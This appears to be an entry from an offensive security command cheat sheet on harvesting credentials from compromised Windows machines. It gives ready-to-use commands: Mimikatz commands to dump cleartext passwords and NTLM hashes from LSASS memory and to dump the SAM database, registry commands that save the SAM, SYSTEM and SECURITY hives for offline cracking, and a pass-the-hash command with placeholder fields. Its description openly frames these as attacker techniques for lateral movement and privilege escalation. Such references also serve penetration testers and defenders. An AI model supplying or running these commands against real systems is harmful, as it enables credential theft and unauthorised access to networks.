🛠️ Command

Mimikatz: Dump LSASS Passwords

Extract cleartext passwords and NTLM hashes from the LSASS process memory.

mimikatz.exe "privilege::debug" "sekurlsa::logonpasswords" "exit"

Mimikatz: Dump SAM Database

Dump local account hashes from the Security Account Manager (SAM).

mimikatz.exe "privilege::debug" "lsadump::sam" "exit"

Registry: Save SAM and SYSTEM hives

Copy the registry hives to disk for offline hash extraction (e.g., with Impacket's secretsdump) and subsequent cracking.

reg save HKLM\SAM sam.save; reg save HKLM\SYSTEM system.save; reg save HKLM\SECURITY security.save

Mimikatz: Pass-the-Hash (PtH)

Create a new process as a different user using their NTLM hash.

mimikatz.exe "privilege::debug" "sekurlsa::pth /user:{{username}} /domain:{{domain}} /ntlm:{{ntlm_hash}}"

📝 Description

Post-exploitation techniques for harvesting credentials from compromised Windows systems.

These tools allow an attacker to obtain the credentials needed for lateral movement and privilege escalation. Mimikatz is the premier tool for memory-based attacks, while the registry method is a stealthier alternative for offline analysis using tools like Impacket’s secretsdump.

🔗 References